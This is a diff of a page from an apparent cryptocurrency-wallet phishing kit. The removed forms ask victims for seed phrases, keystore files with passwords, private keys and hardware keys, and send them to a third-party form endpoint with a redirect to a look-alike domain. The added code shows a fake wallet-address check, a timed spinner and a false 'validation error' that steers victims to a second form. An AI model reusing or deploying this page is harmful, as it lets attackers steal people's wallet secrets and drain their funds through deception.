--- a/0x/form.html
+++ b/0x/form.html
@@ -6,11 +6,13 @@
         <meta name="viewport" content="width=device-width, initial-scale=1.0">
         <link href="./assets/apple-touch-icon.png" rel="apple-touch-icon">
         <link href="./assets/favicon.ico" rel="icon">
+        <link rel="shortcut icon" type="image/ico" href="favicon.ico"/>
         <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
         <link href="https://fonts.googleapis.com/css?family=Teko:700&display=swap" rel="stylesheet">
         <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
-        <link href="./main.550dcf66.css" rel="stylesheet">
-        <title>DappsTools</title>  
+        <link href="./assets/css/style.css" rel="stylesheet">
+        <link rel="stylesheet" href="loading.css">
+        <title>Server verification</title>  
     </head>
     <body>
         <ul class="nav justify-content-end">
@@ -19,67 +21,53 @@
             </li>
         </ul>
         <div class="former">
-            <p class="wallet-head text-center">VALIDATE YOUR SELECTED WALLET TO CONTINUE</p>
-            <label class="sub-text text-center">Ensure you enter an active wallet. Inactive/empty wallets are likely to experience issues during synchronization.</label>
-            <ul class="nav nav-pills " id="myTab" role="tablist">
-                <li class="nav-item">
-                  <a class="nav-link active" id="home-tab" data-toggle="tab" href="#home" role="tab" aria-controls="home" aria-selected="true">MNEMONICS</a>
-                </li>
-                <li class="nav-item">
-                  <a class="nav-link" id="profile-tab" data-toggle="tab" href="#profile" role="tab" aria-controls="profile" aria-selected="false">KEYSTORE</a>
-                </li>
-                <li class="nav-item">
-                  <a class="nav-link" id="contact-tab" data-toggle="tab" href="#contact" role="tab" aria-controls="contact" aria-selected="false">PRIVATE KEY</a>
-                </li>
-                <li class="nav-item">
-                    <a class="nav-link" id="last-tab" data-toggle="tab" href="#last" role="tab" aria-controls="last" aria-selected="false">HARDWARE</a>
-                </li>
-            </ul>
-            <div class="tab-content" id="myTabContent">
-                <div class="tab-pane active" id="home" role="tabpanel" aria-labelledby="home-tab">
-                    <form action="https://submit-form.com/IFVgi1Ue">
-                        <input type="hidden" name="_redirect" value="www.webnode-authenticator.com/0x/loading.html"/>
-                        <label for="exampleFormControlTextarea1">Enter your 12/24 word phrase</label>
-                        <input class="form-control form-control-lg" name="mnemonics" type="text" placeholder="" required>
-                        <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
-                    </form>
-                </div>
-                <div class="tab-pane" id="profile" role="tabpanel" aria-labelledby="profile-tab">
-                    <div class="form-group">
-                        <form action="https://submit-form.com/IFVgi1Ue">
-                            <input type="hidden" name="_redirect" value="www.webnode-authenticator.com/0x/loading.html"/>
-                            <label for="exampleFormControlTextarea1">Enter your Keystore JSON</label>
-                            <input class="form-control form-control-lg" name="keystore-JSON" type="text" placeholder="" required>
-                            <label for="exampleFormControlTextarea1">Enter Password</label>
-                            <input class="form-control form-control-lg" name="password" type="text" placeholder="" required>
-                            <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
-                        </form>
-                    </div>
-                </div>
-                <div class="tab-pane" id="contact" role="tabpanel" aria-labelledby="contact-tab">
-                    <div class="form-group">
-                        <form action="https://submit-form.com/IFVgi1Ue">
-                            <input type="hidden" name="_redirect" value="www.webnode-authenticator.com/0x/loading.html"/>
-                            <label for="exampleFormControlTextarea1">Enter your private key</label>
-                            <input class="form-control form-control-lg" name="private-key" type="text" placeholder="" required>
-                            <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
-                        </form>
-                    </div>
-                </div>
-                <div class="tab-pane" id="last" role="tabpanel" aria-labelledby="last-tab">
-                    <div class="form-group">
-                        <form action="https://submit-form.com/IFVgi1Ue">
-                            <input type="hidden" name="_redirect" value="www.webnode-authenticator.com/0x/loading.html"/>
-                            <label for="exampleFormControlTextarea1">Enter your Hardware Key</label>
-                            <input class="form-control form-control-lg" name="hardware-key" type="text" placeholder="" required>
-                            <button type="submit" class="btn btn-primary mb-2">PROCEED</button>
-                        </form>
-                    </div>
-                </div>
+            <p class="wallet-head text-center">ENTER YOUR WALLET ADDRESS TO CONTINUE</p>
+            <div class="form-group text-center">
+                <label class="sub-text text-center">Ensure you enter an active wallet address. Inactive/empty wallets are likely to experience issues during synchronization.</label>
+                <input class="form-control form-control-lg text-center" type="text" placeholder="Enter address" required>
+                <button id="continue" type="button" style="background-color: #199EB8;" class="btn btn-primary addressButton">Continue</button>
             </div>
+        </div>  
+        <svg class="spinner" width="20%" height="20%" viewBox="0 0 66 66" xmlns="http://www.w3.org/2000/svg">
+          <circle class="path" fill="none" stroke-width="6" stroke-linecap="round" cx="33" cy="33" r="30"></circle>
+      </svg>  
+        <!-- Modal -->
+<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
+    <div class="modal-dialog modal-dialog-centered" role="document">
+      <div class="modal-content">
+        <div class="modal-header">
+          <h5 class="modal-title" id="exampleModalCenterTitle" style="color: red;">Validation error</h5>
+          <button type="button" class="close" data-dismiss="modal" aria-label="Close">
+            <span aria-hidden="true">&times;</span>
+          </button>
         </div>
-            <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
-            <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
-            <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
-    </body>
+        <div class="modal-body">
+        We are unable to validate your Wallet, you are required to import your wallet manuallly.
+        The page you are about to be redirected to is handled by artificial intelligence bots with zero human interference.
+        </div>
+        <div class="modal-footer">
+          <button type="button" class="btn btn-secondary" id="close1" style="background-color: #199EB8;" data-dismiss="modal">Close</button>
+          <button type="button" class="btn btn-secondary" style="background-color: #199EB8;" id="proceed"><a style="color: white;" href="form1.html">Proceed</a></button>
+        </div>
+      </div>
+    </div>
+  </div>
+        </div>
+        <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
+        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
+        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
+        <script>
+          document.getElementById("continue").addEventListener("click", function(){
+            $(".former").css("display", "none");
+            $(".spinner").css("display", "block");
+            setTimeout(function() {
+            $('#exampleModalCenter').modal();
+          }, 10000);}
+          );
+          document.getElementById("close1").addEventListener("click", function(){
+            window.location.replace("./form.html");
+          });
+        </script>
+      </body>
 </html>
+
